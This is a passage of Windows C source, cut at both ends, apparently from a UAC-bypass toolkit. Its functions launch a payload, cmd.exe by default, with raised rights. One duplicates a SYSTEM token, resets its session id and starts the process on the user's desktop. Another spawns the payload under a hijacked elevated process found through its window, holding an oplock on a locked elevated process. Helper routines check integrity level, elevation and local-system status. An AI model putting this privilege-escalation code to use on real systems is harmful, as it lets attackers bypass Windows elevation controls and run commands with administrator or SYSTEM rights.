NtClose(processInfo.hThread);\n }\n\n //\n // Post execution cleanup if required.\n //\n if (bCommandLineAllocated)\n ucmxHeapFree(lpCommandLine);\n\n return bResult;\n}\n\n/*\n* ucmLaunchPayloadEx\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayloadEx(\n _In_ PFNCREATEPROCESSW pCreateProcess,\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload)\n{\n BOOL bResult = FALSE, bCommandLineAllocated = FALSE;\n WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line\n WCHAR sysdir[MAX_PATH + 1]; //process working directory\n STARTUPINFO startupInfo;\n PROCESS_INFORMATION processInfo;\n\n DWORD dwCreationFlags = CREATE_NEW_CONSOLE;\n\n LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;\n SIZE_T memIO;\n\n if (pCreateProcess == NULL)\n return bResult;\n\n //\n // Query working directory.\n //\n RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n ucmxQuerySystemDirectory(sysdir, TRUE);\n\n //\n // Query startup info from parent.\n //\n RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n startupInfo.cb = sizeof(startupInfo);\n ucmGetStartupInfo(&startupInfo);\n\n //\n // Determine what we want to execute, custom parameter or default cmd.exe\n //\n if (pszPayload && cbPayload) {\n\n //\n // We can use custom payload, copy it to internal buffer.\n //\n memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n if (lpCommandLine) {\n\n dwCreationFlags = 0;\n bCommandLineAllocated = TRUE;\n\n RtlCopyMemory(lpCommandLine,\n pszPayload,\n cbPayload);\n\n }\n }\n else {\n\n //\n // Default cmd.exe should be started.\n //\n RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n _strcpy(cmdbuf, sysdir);\n _strcat(cmdbuf, L\"cmd.exe\");\n\n lpApplicationName = cmdbuf;\n lpCommandLine = NULL;\n bCommandLineAllocated = FALSE;\n }\n\n startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n startupInfo.wShowWindow = SW_SHOW;\n\n RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n //\n // Launch payload.\n //\n bResult = pCreateProcess(\n lpApplicationName,\n lpCommandLine,\n NULL,\n NULL,\n FALSE,\n dwCreationFlags,\n NULL,\n sysdir,\n &startupInfo,\n &processInfo);\n\n if (bResult) {\n //\n // We don't need these handles, close them.\n //\n NtClose(processInfo.hProcess);\n NtClose(processInfo.hThread);\n }\n\n //\n // Post execution cleanup if required.\n //\n if (bCommandLineAllocated)\n ucmxHeapFree(lpCommandLine);\n\n return bResult;\n}\n\n/*\n* ucmLaunchPayload2\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload2(\n _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,\n _In_ BOOL bIsLocalSystem,\n _In_ ULONG SessionId,\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload)\n{\n BOOL bResult = FALSE, bCommandLineAllocated = FALSE, bSrvExec = FALSE;\n WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line\n WCHAR sysdir[MAX_PATH + 1]; //process working directory\n STARTUPINFO startupInfo;\n PROCESS_INFORMATION processInfo;\n\n DWORD dwCreationFlags = CREATE_NEW_CONSOLE;\n\n LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;\n SIZE_T memIO;\n\n NTSTATUS status;\n HANDLE hToken = NULL, hDupToken = NULL;\n SECURITY_QUALITY_OF_SERVICE sqos;\n OBJECT_ATTRIBUTES obja;\n\n ULONG CurrentSessionId = NtCurrentPeb()->SessionId;\n\n#ifdef _TRACE_CALL\n WCHAR szDebugBuf[1000];\n#endif //_TRACE_CALL\n\n do {\n\n bSrvExec = ((bIsLocalSystem) && (CurrentSessionId != SessionId));\n\n#ifdef _TRACE_CALL\n if (bSrvExec)\n OutputDebugString(L\"bServExec\");\n#endif //_TRACE_CALL\n\n //\n // In case of service start, prepare token for CreateProcessAsUser.\n // Set token session id, to do this we need SE_TCB_PRIVILEGE, check it enabled.\n //\n if (bSrvExec) {\n\n status = NtOpenProcessToken(\n NtCurrentProcess(),\n TOKEN_ALL_ACCESS,\n &hToken);\n\n if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n _strcpy(szDebugBuf, L\"NtOpenProcessToken = 0x\");\n ultohex(status, _strend(szDebugBuf));\n _strcat(szDebugBuf, L\"\\r\\n\");\n OutputDebugString(szDebugBuf);\n#endif //_TRACE_CALL\n break;\n }\n\n#ifdef _TRACE_CALL\n if (!ucmPrivilegeEnabled(hToken, SE_ASSIGNPRIMARYTOKEN_PRIVILEGE)) {\n OutputDebugString(L\"ucmPrivilegeEnabled->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE not set\\r\\n\");\n }\n#endif //_TRACE_CALL\n\n if (!ucmPrivilegeEnabled(hToken, SE_TCB_PRIVILEGE)) {\n#ifdef _TRACE_CALL\n OutputDebugString(L\"ucmPrivilegeEnabled->SE_TCB_PRIVILEGE not set\\r\\n\");\n#endif //_TRACE_CALL\n break;\n }\n\n sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n sqos.ImpersonationLevel = SecurityImpersonation;\n sqos.ContextTrackingMode = 0;\n sqos.EffectiveOnly = FALSE;\n InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n obja.SecurityQualityOfService = &sqos;\n\n status = NtDuplicateToken(\n hToken,\n TOKEN_ALL_ACCESS,\n &obja,\n FALSE,\n TokenPrimary,\n &hDupToken);\n\n if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n _strcpy(szDebugBuf, L\"NtDuplicateToken = 0x\");\n ultohex(status, _strend(szDebugBuf));\n _strcat(szDebugBuf, L\"\\r\\n\");\n OutputDebugString(szDebugBuf);\n#endif //_TRACE_CALL\n break;\n }\n\n status = NtSetInformationToken(\n hDupToken,\n TokenSessionId,\n (PVOID)&SessionId,\n sizeof(ULONG));\n\n if (!NT_SUCCESS(status)) {\n#ifdef _TRACE_CALL\n _strcpy(szDebugBuf, L\"NtSetInformationToken = 0x\");\n ultohex(status, _strend(szDebugBuf));\n _strcat(szDebugBuf, L\"\\r\\n\");\n OutputDebugString(szDebugBuf);\n#endif //_TRACE_CALL\n break;\n }\n\n }\n else {\n //\n // Not a service start, use default token value.\n //\n hDupToken = NULL;\n }\n\n //\n // Query working directory.\n //\n RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n ucmxQuerySystemDirectory(sysdir, FALSE);\n\n#ifdef _TRACE_CALL\n OutputDebugString(sysdir);\n#endif //_TRACE_CALL\n\n //\n // Query startup info from parent.\n //\n RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n startupInfo.cb = sizeof(startupInfo);\n ucmGetStartupInfo(&startupInfo);\n\n //\n // Determine what we want to execute, custom parameter or default cmd.exe\n //\n if (pszPayload && cbPayload) {\n\n //\n // We can use custom payload, copy it to internal buffer.\n //\n memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n if (lpCommandLine) {\n\n dwCreationFlags = 0;\n bCommandLineAllocated = TRUE;\n\n RtlCopyMemory(lpCommandLine,\n pszPayload,\n cbPayload);\n\n }\n }\n else {\n\n //\n // Default cmd.exe should be started.\n //\n RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n _strcpy(cmdbuf, sysdir);\n _strcat(cmdbuf, L\"cmd.exe\");\n\n lpApplicationName = cmdbuf;\n lpCommandLine = NULL;\n bCommandLineAllocated = FALSE;\n }\n\n startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n startupInfo.wShowWindow = SW_SHOW;\n\n RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n //\n // In case of start from service, force default WinStation and Desktop.\n //\n // Future note: maybe moved to registry settings as custom winsta param.\n //\n if (bSrvExec) {\n startupInfo.lpDesktop = TEXT(\"Winsta0\\\\Default\");\n }\n\n //\n // Launch payload.\n //\n bResult = pCreateProcessAsUser(\n hDupToken,\n lpApplicationName,\n lpCommandLine,\n NULL,\n NULL,\n FALSE,\n dwCreationFlags,\n NULL,\n sysdir,\n &startupInfo,\n &processInfo);\n\n if (bResult) {\n#ifdef _TRACE_CALL\n OutputDebugString(L\"CreateProcessAsUser success\\r\\n\");\n#endif //_TRACE_CALL\n //\n // We don't need these handles, close them.\n //\n NtClose(processInfo.hProcess);\n NtClose(processInfo.hThread);\n }\n#ifdef _TRACE_CALL\n else {\n _strcpy(szDebugBuf, L\"CreateProcessAsUser failed with code = 0x\");\n ultohex(GetLastError(), _strend(szDebugBuf));\n _strcat(szDebugBuf, L\"\\r\\n\");\n OutputDebugString(szDebugBuf);\n }\n\n#endif //_TRACE_CALL\n } while (FALSE);\n\n //\n // Post execution cleanup if required.\n //\n if (bCommandLineAllocated)\n ucmxHeapFree(lpCommandLine);\n\n if (bSrvExec) {\n if (hToken)\n NtClose(hToken);\n if (hDupToken)\n NtClose(hDupToken);\n }\n\n return bResult;\n}\n\n/*\n* ucmLaunchPayload3\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload3(\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload)\n{\n BOOL bResult = FALSE, bCommandLineAllocated = FALSE;\n ULONG i;\n HWND hwnd;\n HANDLE hProcess;\n LPWSTR lpCommandLine = NULL;\n SIZE_T memIO;\n OPLOCK_FILE_CONTEXT ofc;\n PROCESS_INFORMATION pi;\n\n WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line\n WCHAR sysdir[MAX_PATH + 1]; //process working directory\n\n if (ucmCheckUIAccessPermissions()) {\n\n //\n // Determine what we want to execute, custom parameter or default cmd.exe\n //\n if (pszPayload && cbPayload) {\n\n //\n // We can use custom payload, copy it to internal buffer.\n //\n memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n if (lpCommandLine) {\n\n bCommandLineAllocated = TRUE;\n\n RtlCopyMemory(lpCommandLine,\n pszPayload,\n cbPayload);\n\n }\n }\n else {\n\n //\n // Default cmd.exe should be started.\n //\n\n RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n\n //\n // Query working directory.\n //\n RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n ucmxQuerySystemDirectory(sysdir, FALSE);\n\n _strcpy(cmdbuf, sysdir);\n _strcat(cmdbuf, L\"cmd.exe\");\n\n lpCommandLine = cmdbuf;\n bCommandLineAllocated = FALSE;\n }\n\n RtlSecureZeroMemory(&ofc, sizeof(ofc));\n ofc.Length = sizeof(ofc);\n ofc.FileHandle = INVALID_HANDLE_VALUE;\n\n hwnd = ucmFindFirstElevatedWindow();\n if (!hwnd) {\n if (ucmStartBackupLockedElevatedProcess(&ofc)) {\n for (i = 0; i < 5000; i += 500) {\n ucmSleep(500);\n hwnd = ucmFindFirstElevatedWindow();\n }\n }\n }\n if (hwnd)\n {\n RtlSecureZeroMemory(&pi, sizeof(pi));\n hProcess = ucmGetHwndFullProcessHandle(hwnd);\n if (hProcess)\n {\n bResult = ucmCreateProcessWithParent(lpCommandLine, hProcess, CREATE_NEW_CONSOLE, SW_SHOW, &pi);\n if (bResult) {\n CloseHandle(pi.hThread);\n CloseHandle(pi.hProcess);\n\n }\n CloseHandle(hProcess);\n }\n }\n\n if (ofc.FileHandle != INVALID_HANDLE_VALUE) {\n ucmReleaseOpLock(&ofc);\n }\n\n }\n\n //\n // Post execution cleanup if required.\n //\n if (bCommandLineAllocated)\n ucmxHeapFree(lpCommandLine);\n\n return bResult;\n}\n\n/*\n* ucmQueryRuntimeInfo\n*\n* Purpose:\n*\n* Output current process runtime information.\n*\n*/\nLPWSTR ucmQueryRuntimeInfo(\n _In_ BOOL ReturnData)\n{\n BOOL bFound = FALSE;\n NTSTATUS status;\n DWORD dwIntegrityLevel;\n ULONG LengthNeeded = 0;\n ULONG SessionId = NtCurrentPeb()->SessionId;\n\n HANDLE hToken = NULL;\n\n PTOKEN_MANDATORY_LABEL pTIL = NULL;\n TOKEN_USER* ptu = NULL;\n\n PROCESS_BASIC_INFORMATION pbi;\n PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n PSYSTEM_PROCESS_INFORMATION ProcessList, pList;\n\n LSA_OBJECT_ATTRIBUTES lobja;\n LSA_HANDLE PolicyHandle = NULL;\n PLSA_REFERENCED_DOMAIN_LIST ReferencedDomains = NULL;\n PLSA_TRANSLATED_NAME Names = NULL;\n SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n\n LPWSTR lpReport, lpValue = TEXT(\"Unknown\");\n\n WCHAR szBuffer[MAX_PATH + 1];\n\n RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n if (GetModuleFileName(NULL, (LPWSTR)&szBuffer, MAX_PATH) == 0)\n return NULL;\n\n lpReport = (LPWSTR)ucmxHeapAlloc(2 * PAGE_SIZE);\n if (lpReport == NULL)\n return NULL;\n\n //\n // 1. Attach module name.\n //\n _strncpy(lpReport, MAX_PATH, szBuffer, MAX_PATH);\n\n //\n // 2. Inherited from.\n //\n RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));\n status = NtQueryInformationProcess(\n NtCurrentProcess(),\n ProcessBasicInformation,\n &pbi,\n sizeof(PROCESS_BASIC_INFORMATION),\n &LengthNeeded);\n\n if (NT_SUCCESS(status)) {\n\n _strcpy(szBuffer, TEXT(\"\\r\\nInherited from PID=\"));\n#ifdef _WIN64\n u64tostr(pbi.InheritedFromUniqueProcessId, _strend(szBuffer));\n#else \n ultostr((ULONG)pbi.InheritedFromUniqueProcessId, _strend(szBuffer));\n#endif\n _strcat(lpReport, szBuffer);\n _strcat(lpReport, TEXT(\" (\"));\n\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n bFound = FALSE;\n\n ProcessList = (PSYSTEM_PROCESS_INFORMATION)ucmGetSystemInfo(SystemProcessInformation);\n if (ProcessList) {\n\n pList = ProcessList;\n\n for (;;) {\n\n if ((ULONG_PTR)pList->UniqueProcessId == pbi.InheritedFromUniqueProcessId) {\n\n _strncpy(szBuffer,\n MAX_PATH,\n pList->ImageName.Buffer,\n pList->ImageName.Length / sizeof(WCHAR));\n\n bFound = TRUE;\n\n break;\n }\n if (pList->NextEntryDelta == 0) {\n break;\n }\n pList = (PSYSTEM_PROCESS_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);\n }\n ucmxHeapFree(ProcessList);\n }\n\n if (bFound) {\n _strcat(lpReport, szBuffer);\n }\n else {\n _strcat(lpReport, TEXT(\"Non-existent Process\"));\n }\n _strcat(lpReport, TEXT(\")\"));\n\n }\n\n //\n // 3. Query various token releated data.\n //\n //\n // 3.1 Integrity value.\n // 3.2 User\\Domain name\n // 3.3 Session info\n //\n status = NtOpenProcessToken(\n NtCurrentProcess(),\n TOKEN_QUERY,\n &hToken);\n\n if (NT_SUCCESS(status)) {\n\n LengthNeeded = 0;\n status = NtQueryInformationToken(\n hToken,\n TokenIntegrityLevel,\n NULL,\n 0,\n &LengthNeeded);\n\n if (status == STATUS_BUFFER_TOO_SMALL) {\n\n pTIL = (PTOKEN_MANDATORY_LABEL)ucmxHeapAlloc(LengthNeeded);\n\n if (pTIL) {\n\n status = NtQueryInformationToken(\n hToken,\n TokenIntegrityLevel,\n pTIL,\n LengthNeeded,\n &LengthNeeded);\n\n if (NT_SUCCESS(status)) {\n\n dwIntegrityLevel = *RtlSubAuthoritySid(pTIL->Label.Sid,\n (DWORD)(UCHAR)(*RtlSubAuthorityCountSid(pTIL->Label.Sid) - 1));\n\n if (dwIntegrityLevel == SECURITY_MANDATORY_UNTRUSTED_RID) {\n lpValue = L\"UntrustedIL\";\n }\n else if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) {\n lpValue = L\"LowIL\";\n }\n else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&\n dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) //skip SECURITY_MANDATORY_MEDIUM_PLUS_RID\n {\n lpValue = L\"MediumIL\";\n }\n else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID &&\n dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID)\n {\n lpValue = L\"HighIL\";\n }\n else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID &&\n dwIntegrityLevel < SECURITY_MANDATORY_PROTECTED_PROCESS_RID)\n {\n lpValue = L\"SystemIL\";\n }\n else if (dwIntegrityLevel >= SECURITY_MANDATORY_PROTECTED_PROCESS_RID)\n {\n lpValue = L\"ProtectedProcessIL\";\n }\n\n _strcpy(szBuffer, TEXT(\"\\r\\nPID=\"));\n ultostr((ULONG)GetCurrentProcessId(), _strend(szBuffer));\n _strcat(szBuffer, TEXT(\", \"));\n _strncpy(_strend(szBuffer), 40, lpValue, 40);\n _strcat(lpReport, szBuffer);\n }\n ucmxHeapFree(pTIL);\n }\n }\n\n //\n // Domain\\User name.\n //\n LengthNeeded = 0;\n status = NtQueryInformationToken(\n hToken,\n TokenUser,\n NULL,\n 0,\n &LengthNeeded);\n\n if (status == STATUS_BUFFER_TOO_SMALL) {\n\n ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);\n\n if (ptu) {\n\n status = NtQueryInformationToken(\n hToken,\n TokenUser,\n ptu,\n LengthNeeded,\n &LengthNeeded);\n\n if (NT_SUCCESS(status)) {\n\n SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation;\n SecurityQualityOfService.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;\n SecurityQualityOfService.EffectiveOnly = FALSE;\n\n InitializeObjectAttributes(\n &lobja,\n NULL,\n 0L,\n NULL,\n NULL);\n\n lobja.SecurityQualityOfService = &SecurityQualityOfService;\n\n status = LsaOpenPolicy(\n NULL,\n &lobja,\n POLICY_LOOKUP_NAMES,\n &PolicyHandle);\n\n if (NT_SUCCESS(status)) {\n\n status = LsaLookupSids(\n PolicyHandle,\n 1,\n &ptu->User.Sid,\n &ReferencedDomains,\n &Names);\n\n if ((NT_SUCCESS(status)) && (status != STATUS_SOME_NOT_MAPPED)) {\n\n if (ReferencedDomains != NULL) {\n szBuffer[0] = 0;\n\n _strncpy(\n szBuffer,\n MAX_PATH,\n ReferencedDomains->Domains[0].Name.Buffer,\n ReferencedDomains->Domains[0].Name.Length / sizeof(WCHAR));\n\n _strcat(lpReport, TEXT(\"\\r\\n\"));\n _strcat(lpReport, szBuffer);\n _strcat(lpReport, TEXT(\"\\\\\"));\n\n }\n\n if (Names != NULL) {\n szBuffer[0] = 0;\n\n _strncpy(\n szBuffer,\n MAX_PATH,\n Names->Name.Buffer,\n Names->Name.Length / sizeof(WCHAR));\n\n _strcat(lpReport, szBuffer);\n }\n }\n\n if (ReferencedDomains) LsaFreeMemory(ReferencedDomains);\n if (Names) LsaFreeMemory(Names);\n\n LsaClose(PolicyHandle);\n }\n\n }\n\n ucmxHeapFree(ptu);\n }\n }\n\n //\n // Session info\n //\n LengthNeeded = 0;\n _strcpy(szBuffer, TEXT(\"\\r\\nSessionId=\"));\n ultostr(SessionId, _strend(szBuffer));\n _strcat(lpReport, szBuffer);\n\n _strcat(lpReport, TEXT(\"\\r\\nInteractive Winstation=\"));\n if (ucmIsUserWinstaInteractive())\n _strcat(lpReport, TEXT(\"yes\"));\n else\n _strcat(lpReport, TEXT(\"no\"));\n\n NtClose(hToken);\n }\n\n //\n // 4. Wow64\n //\n RtlSecureZeroMemory(&pebi, sizeof(pebi));\n pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n\n status = NtQueryInformationProcess(\n NtCurrentProcess(),\n ProcessBasicInformation,\n &pebi,\n sizeof(pebi),\n NULL);\n\n if (NT_SUCCESS(status)) {\n _strcpy(szBuffer, TEXT(\"\\r\\nWOW64 Enabled=\"));\n ultostr(pebi.IsWow64Process, _strend(szBuffer));\n _strcat(lpReport, szBuffer);\n }\n\n if (ReturnData == FALSE) {\n\n MessageBox(\n GetDesktopWindow(),\n lpReport,\n GetCommandLine(),\n MB_ICONINFORMATION);\n\n ucmxHeapFree(lpReport);\n lpReport = NULL;\n }\n\n return lpReport;\n}\n\n/*\n* ucmDestroyRuntimeInfo\n*\n* Purpose:\n*\n* Release memory allocated by ucmQueryRuntimeInfo if ReturnData flag used.\n*\n*/\nBOOLEAN ucmDestroyRuntimeInfo(\n _In_ LPWSTR RuntimeInfo)\n{\n return ucmxHeapFree((PVOID)RuntimeInfo);\n}\n\n/*\n* ucmIsUserWinstaInteractive\n*\n* Purpose:\n*\n* Return TRUE if current user operates on Winstation with visible surfaces, FALSE otherwise.\n*\n*/\nBOOL ucmIsUserWinstaInteractive(\n VOID\n)\n{\n BOOL bResult = TRUE;\n USEROBJECTFLAGS uof;\n HWINSTA hWinStation;\n\n //\n // Open current winstation.\n //\n hWinStation = GetProcessWindowStation();\n if (hWinStation) {\n //\n // Query winstation flags.\n //\n if (GetUserObjectInformation(\n hWinStation,\n UOI_FLAGS,\n &uof,\n sizeof(USEROBJECTFLAGS),\n NULL))\n {\n //\n // Are winstation has visible surfaces?\n //\n if ((uof.dwFlags & WSF_VISIBLE) == 0)\n bResult = FALSE;\n }\n }\n return bResult;\n}\n\n/*\n* ucmIsUserHasInteractiveSid\n*\n* Purpose:\n*\n* pbInteractiveSid will be set to TRUE if current user has interactive sid, FALSE otherwise.\n*\n* Function return operation status code.\n*\n*/\nNTSTATUS ucmIsUserHasInteractiveSid(\n _In_ HANDLE hToken,\n _Out_ PBOOL pbInteractiveSid)\n{\n BOOL IsInteractiveSid = FALSE;\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n ULONG LengthNeeded = 0;\n\n DWORD i;\n\n SID_IDENTIFIER_AUTHORITY SidAuth = SECURITY_NT_AUTHORITY;\n PSID InteractiveSid = NULL;\n PTOKEN_GROUPS groupInfo = NULL;\n\n do {\n\n status = NtQueryInformationToken(\n hToken,\n TokenGroups,\n NULL,\n 0,\n &LengthNeeded);\n\n if (status != STATUS_BUFFER_TOO_SMALL)\n break;\n\n groupInfo = (PTOKEN_GROUPS)ucmxHeapAlloc(LengthNeeded);\n\n if (groupInfo == NULL)\n break;\n\n status = NtQueryInformationToken(\n hToken,\n TokenGroups,\n groupInfo,\n LengthNeeded,\n &LengthNeeded);\n\n if (!NT_SUCCESS(status))\n break;\n\n status = RtlAllocateAndInitializeSid(\n &SidAuth,\n 1,\n SECURITY_INTERACTIVE_RID,\n 0, 0, 0, 0, 0, 0, 0,\n &InteractiveSid);\n\n if (!NT_SUCCESS(status))\n break;\n\n for (i = 0; i < groupInfo->GroupCount; i++) {\n\n if (RtlEqualSid(\n InteractiveSid,\n groupInfo->Groups[i].Sid))\n {\n IsInteractiveSid = TRUE;\n break;\n }\n }\n\n } while (FALSE);\n\n if (groupInfo != NULL)\n ucmxHeapFree(groupInfo);\n\n if (pbInteractiveSid)\n *pbInteractiveSid = IsInteractiveSid;\n\n if (InteractiveSid)\n RtlFreeSid(InteractiveSid);\n\n return status;\n}\n\n/*\n* ucmIsLocalSystem\n*\n* Purpose:\n*\n* pbResult will be set to TRUE if current account is run by system user, FALSE otherwise.\n*\n* Function return operation status code.\n*\n*/\nNTSTATUS ucmIsLocalSystem(\n _Out_ PBOOL pbResult)\n{\n BOOL bResult = FALSE;\n\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n HANDLE hToken = NULL;\n\n ULONG LengthNeeded = 0;\n\n PSID SystemSid = NULL;\n PTOKEN_USER ptu = NULL;\n SID_IDENTIFIER_AUTHORITY NtAuth = SECURITY_NT_AUTHORITY;\n\n status = NtOpenProcessToken(\n NtCurrentProcess(),\n TOKEN_QUERY,\n &hToken);\n\n if (NT_SUCCESS(status)) {\n\n status = NtQueryInformationToken(\n hToken,\n TokenUser,\n NULL,\n 0,\n &LengthNeeded);\n\n if (status == STATUS_BUFFER_TOO_SMALL) {\n\n ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);\n\n if (ptu) {\n\n status = NtQueryInformationToken(\n hToken,\n TokenUser,\n ptu,\n LengthNeeded,\n &LengthNeeded);\n\n if (NT_SUCCESS(status)) {\n\n status = RtlAllocateAndInitializeSid(\n &NtAuth,\n 1,\n SECURITY_LOCAL_SYSTEM_RID,\n 0, 0, 0, 0, 0, 0, 0,\n &SystemSid);\n\n if (NT_SUCCESS(status)) {\n bResult = RtlEqualSid(ptu->User.Sid, SystemSid);\n RtlFreeSid(SystemSid);\n }\n\n }\n ucmxHeapFree(ptu);\n }\n else {\n status = STATUS_INSUFFICIENT_RESOURCES;\n }\n } //STATUS_BUFFER_TOO_SMALL\n NtClose(hToken);\n }\n\n if (pbResult)\n *pbResult = bResult;\n\n return status;\n}\n\n/*\n* ucmGetProcessElevationType\n*\n* Purpose:\n*\n* Returns process elevation type.\n*\n*/\nBOOL ucmGetProcessElevationType(\n _In_opt_ HANDLE ProcessHandle,\n _Out_ TOKEN_ELEVATION_TYPE * lpType\n)\n{\n HANDLE hToken = NULL, processHandle = ProcessHandle;\n NTSTATUS Status;\n ULONG BytesRead = 0;\n TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n\n if (ProcessHandle == NULL) {\n processHandle = GetCurrentProcess();\n }\n\n Status = NtOpenProcessToken(processHandle, TOKEN_QUERY, &hToken);\n if (NT_SUCCESS(Status)) {\n\n Status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,\n sizeof(TOKEN_ELEVATION_TYPE), &BytesRead);\n\n NtClose(hToken);\n }\n\n if (lpType)\n *lpType = TokenType;\n\n return (NT_SUCCESS(Status));\n}\n\n/*\n* ucmIsProcessElevated\n*\n* Purpose:\n*\n* Returns process elevation state.\n*\n*/\nNTSTATUS ucmIsProcessElevated(\n _In_ ULONG ProcessId,\n _Out_ PBOOL Elevated)\n{\n NTSTATUS Status;\n ULONG Dummy;\n HANDLE ProcessHandle, TokenHandle;\n CLIENT_ID ClientId;\n TOKEN_ELEVATION TokenInfo;\n OBJECT_ATTRIBUTES ObAttr = RTL_INIT_OBJECT_ATTRIBUTES(NULL, 0);\n\n ClientId.UniqueProcess = UlongToHandle(ProcessId);\n ClientId.UniqueThread = NULL;\n\n if (Elevated) *Elevated = FALSE;\n\n Status = NtOpenProcess(&ProcessHandle, MAXIMUM_ALLOWED, &ObAttr, &ClientId);\n if (NT_SUCCESS(Status)) {\n\n Status = NtOpenProcessToken(ProcessHandle, TOKEN_QUERY, &TokenHandle);\n if (NT_SUCCESS(Status)) {\n\n TokenInfo.TokenIsElevated = 0;\n Status = NtQueryInformationToken(TokenHandle,\n TokenElevation, &TokenInfo,\n sizeof(TOKEN_ELEVATION), &Dummy);\n\n if (NT_SUCCESS(Status)) {\n if (Elevated) *Elevated = (TokenInfo.TokenIsElevated > 0);\n }\n NtClose(TokenHandle);\n }\n NtClose(ProcessHandle);\n }\n\n return Status;\n}\n\n/*\n* ucmSetEnvironmentVariable\n*\n* Purpose:\n*\n* SetEnvironmentVariable replacement.\n*\n*/\nBOOL ucmSetEnvironmentVariable(\n _In_ LPCWSTR lpName,\n _In_ LPCWSTR lpValue\n)\n{\n NTSTATUS ntStatus;\n UNICODE_STRING Name, Value;\n\n ntStatus = RtlInitUnicodeStringEx(&Name, lpName);\n if (!NT_SUCCESS(ntStatus)) {\n return FALSE;\n }\n\n if (lpValue) {\n ntStatus = RtlInitUnicodeStringEx(&Value, lpValue);\n if (!NT_SUCCESS(ntStatus)) {\n return FALSE;\n }\n\n ntStatus = RtlSetEnvironmentVariable(NULL, &Name, &Value);\n }\n else {\n ntStatus = RtlSetEnvironmentVariable(NULL, &Name, NULL);\n }\n\n return (NT_SUCCESS(ntStatus));\n\n}\n\n//\n// OpLocks from R41N3RZUF477.\n//\n\n/*\n* ucmxWaitForOpLockThread\n*\n* Purpose:\n*\n* Thread procedure to wait for oplock notification.\n*\n*/\nDWORD WINAPI ucmxWaitForOpLockThread(\n _In_ LPVOID p)\n{\n DWORD bret = 0;\n POPLOCK_FILE_CONTEXT ofc = (POPLOCK_FILE_CONTEXT)p;\n\n if (p == NULL) {\n return 1;\n }\n\n bret = 0;\n if (!GetOverlappedResult(ofc->FileHandle, &ofc->Overlapped, &bret, TRUE)) {\n return 1;\n }\n\n return 0;\n}\n\n/*\n* ucmWaitForOpLock\n*\n* Purpose:\n*\n* Wait for oplock notification with timeout.\n* Returns TRUE if oplock was successfully acquired and signaled, FALSE otherwise.\n*\n*/\nBOOL ucmWaitForOpLock(\n _In_ POPLOCK_FILE_CONTEXT ofc,\n _In_ DWORD timeout\n)\n{\n BOOL bResult = FALSE;\n DWORD exitcode = 0;\n HANDLE thread = NULL;\n\n if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n return FALSE;\n }\n\n thread = CreateThread(NULL, 0x1000, (LPTHREAD_START_ROUTINE)ucmxWaitForOpLockThread,\n (LPVOID)ofc, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);\n if (thread == NULL)\n return FALSE;\n\n do {\n if (WaitForSingleObject(thread, timeout) != WAIT_OBJECT_0) {\n TerminateThread(thread, 1);\n break;\n }\n\n if (GetExitCodeThread(thread, &exitcode)) {\n bResult = (exitcode == 0);\n }\n } while (FALSE);\n\n CloseHandle(thread);\n return 